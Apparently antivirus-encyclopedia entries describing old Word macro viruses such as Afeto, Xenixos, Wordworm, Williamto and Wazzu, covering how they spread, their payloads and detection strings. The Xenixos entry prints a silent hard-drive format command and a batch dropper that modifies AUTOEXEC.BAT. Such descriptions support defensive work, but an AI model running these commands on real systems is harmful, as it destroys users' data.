Details
Macro.Word97.Afeto

This is an Internet worm that spreads through e-mail by using Microsoft Outlook. This worm is Word macro-program written in VBA (the macro-language for Microsoft Office).
When an infected document is opened, the worm macro gains contorl, scans all local drives and looks for a JPG-file less than 50,000 bytes in size. The first found file is then inserted in an active document (current infected document). The worm then creates new messages and sends them. New messages are created for the first eight messages in the MS Outlook “Sent items” folder. The messages are created according to the following involved rules:
as an address in the field “To:” the worm sets the address from a message in the “Sent items” folder
as a subject and body message, it sets the subject and body from next message in the “Sent items” folder
an active document with the worm body is attached to the message
For example, the “Sent Items” folder contains the following messages:
Message 1
To: name1@domen1.com
Subject: Hello!
Text: Do you remember me?
Message 2
To: address2@host2.com
Subject: Good bye.
Text: Today I’m leavingall
Message 3
To: nick3@server3.com
Subject: News.
Text: Great news. …
Outgoing messages (in folder “Outbox”) with a worm will appear in the following way:
Message 1
To: name1@domen1.com
Subject: Good bye.
Text: Today I’m leaving…
Message 2
To: address2@host2.com
Subject: News.
Text: Great news.
Message 3
To: nick3@server3.com e.t.c.
…
Attach: Infected document

An infected document contains a JPEG file that has been selected by the worm as well as a worm macro-program.
In this way, the worm sends an infected message to the first eight recipients, whose addresses have been found in the folder “Sent items”. But for all this, in many instances, the worm breaks confidential correspondence.

Details
Macro.Word97. Appder, Cap, Concept, Czech, Muck, W

These viruses were converted from their MS Word 6/7 prototypes, and as a result they have the same set of macros, functions, features and effects. See “Macro Word viruses” for more details.
Macro.Word97.Agent
This Word97 virus was converted from its Word prototype.
Macro.Word97.Appder
This Word97 virus was converted from its Word prototype.
Macro.Word97.Atom
This Word97 virus was converted from its Word prototype.
Macro.Word97.Blash
This Word97 virus was converted from its Word prototype.
Macro.Word97.Cap
This Word97 virus was converted from its Word prototype.
Macro.Word97.Concept
This Word97 virus was converted from its Word prototype.
Macro.Word97.Czech
This Word97 virus was converted from its Word prototype.
Macro.Word97.KillDll
This Word97 virus was converted from its Word prototype.
Macro.Word97.Monkey
This Word97 virus was converted from its Word prototype.
Macro.Word97.Muck
This Word97 virus was converted from its Word prototype.
Macro.Word97.Ramses
This Word97 virus was converted from its Word prototype.
Macro.Word97.Timer
This Word97 virus was converted from its Word prototype.
Macro.Word97.Wazzu
This Word97 virus was converted from its Word prototype.

Details
Macro.Word.Zoolog

This macro virus contains one macro AutoOpen and replicates on opening documents. The virus deletes all macros in global macros are (NORMAL.DOT). It writes the line “beep=ZOOlog” to the Windows WIN.INI file and detects itself in the system by reading this string. The virus detects already infected documents by “Document Author” string - “ZOOlog”.

Details
Macro.Word.ZMB

This is a German Word macro virus. It contains four macros: AutoOpen (NORMAL.DOT - ZMB), ExtrasMakro, DateiDrucken, DateiSpeichern.
The virus infects the global macros area (NORMAL.DOT) on opening an infected document (AutoOpen) and writes itself to documents that are saved (DateiSpeichern).
This is stealth virus: it replaces Extras/Makro (Tools/Macro) menu with another one. Depending on the system random counter the virus replaces the words while printing documents.
On March 31st it erases the CONFIG.SYS, AUTOEXEC.BAT files and displays the MessageBox:
Osterhasenpolizei
Hallihalloall.
Ich bin der Osterhase und sage Dir, dax man
an Ostern keinen Computer benutzen soll !!

Details
Macro.Word.Zero

This is an encrypted German Word specific macro virus. It contains nine macros:
dateischließen, dokumentschließen, dok, dsu, wrd, extrasmakro,
dateispeichern, dateidokvorlagen, dateispeichernunter

In June it displays the MessageBox with the text:
Lisa, ich liebe dich!

Details
Macro.Word.Zashib

This virus contains four macros: AutoOpen, Knell, Mutagen (Normal:FileOpen), Zashib (Normal:FilePrint). It infects the global macros area on opening an infected document (AutoOpen), the documents get infection also on opening. While printing a document at 16:xx the virus appends to the end of document a text in Russian.

Details
Macro.Word.Xenixos

It is encrypted virus. It contains the macros:
Drop, Dummy, AutoExec, AutoOpen, DateiÖffnen, ExtrasMakro, DateiBeenden,
DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard.

In some cases it sets the password “xenixos” for infected documents, displays the message:
Diese Option ist derzeit leider nicht verfügbar.
Fehler

While printing the documents it appends:
Brought to you by the Nemesis Corporation, L1996

On 1st of may the virus writes the string to the AUTOEXEC.BAT file:
@echo j|format c: /u >nul

This virus also launches “Neurobasher.b” multipartite virus. To do that the virus creates the C:\DOS\SCRIPT.SCR file, and writes hexadecimal dump of that virus into there. Then the virus creates the C:\DOS\EXEC.BAT file, and writes the strings into there:
@echo off
debug < script.scr>nul
rem debugger.com
echo @c:\dos\debugger.exe>>c:\autoexec.bat
del c:\dos\script.scr
del c:\dos\exec.bat

Then the virus executes that file. As the result DEBUG.EXE creates the DEBUGGER.EXE file, and C:\AUTOEXEC.BAT has new string at its end:
@c:\dos\debugger.exe

So, the last command of AUTOEXEC.BAT launches dropper of “Neurobasher.b” virus.

Details
Macro.Word.Wordworm

It is a dangerous Word macro virus. It contains three macros: AutoOpen, ArquivoAbrir, ArquivoSalvarComo. The virus infects the global macro area on opening an infected document (AutoOpen), and writes itself to documents on opening (ArquivoAbrir) and saving with new (ArquivoSalvarComo) name.
On February and April 30 the virus displays the MessageBox:
Alegria, vc sú perdeu todos os seus dados! (C) Worm _ root / 97
WordWorm Virus is fertilizing the soil of your HD (crashing lamah)!!
Copyright (c) - Worm _ root of VBB and Global Destruction Inc.
All rights reserved. H/P/C/CC .) /V/A. Brasil fev/97

The virus then formats the hard drive and inserts the text into the current document:
\|/
(oo) WordWorm
(( )) help To MicroFuck
( _ ) by
( _ ) Worm_root
( _ ) Global Destruction Inc./VBB. No fears, no lamahs. Just us!
( _ ) The brasilian phrackers revenge. Your computer nightmare came true!

Details
Macro.Word.Wordde

This is a dangerous Word macro virus. It contains six macros: WordDE, AutoExec, FileOpen, FilePrint, FileSaveAs, AutoOpen (WordSU in NORMAL.DOT). It infects the system on opening an infected document (AutoOpen), it infects documents that are opened (FileOpen) and saved with new name (FileSaveAs).
The virus sets on the system timer a macro that shutdowns Word in a random selected time. On printing documents the virus replaces a string in Russian with new one. The virus creates the section in Windows profile (WIN.INI file):
[gay]
lox=

When counter reaches 5, the virus erases the COMMAND.COM file.

Details
Macro.Word.Wompie

This virus contains six macros: autoexec, autoopen, FileSave, FileSaveAll, one, Wompie. It infects the system macros area and documents on opening (AutoOpen) and saving (FileSave). The virus deletes menu items File/Templates and Tools/Macro. It contains commented text:
The United Hackers of Amsterdam Presents the Wombat1 or Wompie Created
by The Wombat

Details
Macro.Word.Wmvh

This virus contains two macros in documents (AutoOpen, BieDEMO) and five macros in NORMAL.DOT (AutoNew, AutoOpen, AutoExec, AutoClose, BieDEMO).
It infects the global macros area on opening an infected document (AutoOpen). The documents get infection on AutoNew, AutoOpen, AutoClose.
On October 10th the virus displays the MessageBox:
BieDEMO Macro Virus by WMVH
This is a Demo of Bie’s WMVH

The virus contains the comments:
REM Bie’s Word Macro Virus Hamburger Ver.beta
REM This Macro Virus Made from Bie’s WMVH
REM Bie’s E-Mail: bie111@hotmail.com
REM 2/09/1997

Details
Macro.Word.Williamto

This is an encrypted Word macro virus. It contains 16 macros: Halim, FileNew, AutoOpen, FileOpen, FileSave, FileClose, FilePrint, HelpAbout, Williamto, FileSaveAs, ToolsMacro, FormatStyle, JustifyPara, ViewToolBars, FileTemplates, ToolsCustomize.
The virus infects the global macros area (NORMAL.DOT) on opening an infected document (AutoOpen) and writes itself to documents that are opened, saved or saved with new name (FileOpen, FileSave, FileSaveAs).
This is the stealth virus: it draws its own dialog on entering Tools/Macro menu, on pressing any button the virus displays the MessageBox:
WordBasic Err = 7
Not enough memory

After opening a file the virus displays the message:
Williamto Virus
Williamto WordBasic Virus
Programmed by Williamto Halim
Virus Research Laboratory
Dedicated to Angelia Hadeli

On error while saving files the virus displays:
Attention!!!
Williamto Halim always lives in your computer

On closing files it displays:
File Close
Please close it later! Let’s have fun!

On July 9 it displays:
Nice Day
Happy Birthday Amgelia Hadeli by Williamto Halim

The virus also replaces the “About Microsoft Word” with:
About Microsoft Word
Williamto WordBasic Virus
Programmed by Williamto Halim
Virus Research Laboratory
Dedicated to Angelia Hadeli

On printing documents the virus erases original text and prints its text:
Welcome to Williamto Word Macro Virus
I’m sorry about this but your computer has been infected by
Williamto Word Macro Virus
Please beware about this!!!
This Virus will destroy your data in your disk!!!
Copyright 1997 Virus Research Labs (Jakarta/Indonesia)

While printing the virus outputs to the status line the text:
[ Welcome to Williamto Word Macro Virus - Programmed & Written by
Williamto Halim the Hackers - Virus Research Laboratory ]

On November 11th the virus formats the hard drive and displays the MessageBox:
Attention!!!
I will format your hard disk now, ha-ha-ha!

Details
Macro.Word.Why

This virus contains only one macro, but while infecting copies it to two macros in documents and to three macros in NORMAL.DOT:
documents: AutoOpen, makemacros
NORMAL.DOT: AutoOpen, AutoClose, makemacros

The virus infects the global macros area (NORMAL.DOT) on opening an infected file (AutoOpen), and infects documents that are opened or closed (AutoOpen, AutoClose).
The virus displays the DialogBox:
Why Why Why
Why doesn’t pepole work?
No money
No drink
No eat
No instant noodles
No lunch box

Details
Macro.Word.White

This Word macro-virus contains a different number of macros in documents and template. In documents, there are three macros with names selected from six variants: AutoOpen, AutoClose, FileTemplates, ToolsMacro, FileOpen, Einstein.
While infecting the system, the virus creates the infected NARMOL.DOT template in the Word start-up directory. In this template the virus copies four macros: Einstein, FileOpen, FileTemplates, Show.
The virus contains the comments:
Einsteinium v.1.1. (White Virus)
Solidarity M Forever
Medan 1997

Details
Macro.Word.Wazzu

This virus contains only one macro autoOpen and infects files when MS Word opens them, and copies its macros to Global area (NORMAL.DOT) when MS Word opens an infected document. The virus is not encrypted and may be easily detected by scanning for text strings:
RndWorddo
wazzu do
RndWorddRgV

After infecting a document or installing into the system the virus takes a random selected word from document and moves it to random selected position. The virus repeats that up to three times depending on the random counter. Then it also depending on the random counter inserts the string “wazzu ” at random selected position within document.
In detail: the virus has three subroutines in its macro:
MAIN - it is main routine and it takes control when autoOpen
macro is executed
Payload - is called by MAIN, replaces words and inserts “wazzu”.
RndWord - is called by Payload, sets random selected position
within document

The virus modifies the document with the probabilities (p): replacing words - three times with p=1/5, inserting “wazzu” - p=1/4.
Wazzu-related viruses
The original “Wazzu” (”Wazzu.a”) virus is one of the most widespread viruses on the world. The possible reason is that this virus was placed on the Microsoft WWW site, infected documents also were (are) distributed on several CD disks. As a result there are several dozens of related viruses, and the number of such related viruses is increasing every month. Below short descriptions are given, to name viruses CARO standard names are used (AVP does detect and disinfect majority of these viruses as “Wazzu.a”).
“Wazzu.b,i” differ from original one only by included comment:
< - - - - - - here ’s the payload

“Wazzu.c,t,ac” do not manifest themselves in any way - they have no Payload subroutine (RndWord subroutine presents in virus, but is never called).
“Wazzu.d,f,q,w,ad” do not have both Payload and RndWord subroutines. “Wazzu.f” is a shortest virus in the family - its code (binary data in infected file) has only 318 bytes of length.
“Wazzu.e,h” are encrypted variants of original “Wazzu”. “Wazzu.h” is slightly corrupted and may halt MS Word or cause an error message.
“Wazzu.g,r” are encrypted viruses. “Wazzu.g” contains EatThis subroutine instead of original Payload. With probability 1/10 these viruses display a MessageBox with the text:
Microsoft Word
This one’s for you, Bosco.

“Wazzu.k” is corrupted “Wazzu.a”.
“Wazzu.l” do not have any subroutines in macro except MAIN. With probability 1/10 it appends the string ” wazzu!” to the end of document.
“Wazzu.m,s” have no Payload subroutine, but call it. That will cause Word’s error message.
“Wazzu.u,aa,ad” are the same as “Wazzu.a”, but do not insert the “wazzu” string.
“Wazzu.x” does not contains any subroutines except MAIN. It contains the text:
The Meat Grinder virus - Thanks to Kermit the Frog,
and Kermit the Protocol

“Wazzu.y,z” are the same as “Wazzu.a”, but code of these virus is slightly modified, for example all TAB (09h) symbols are replaced with 8 spaces in “Wazzu.y”.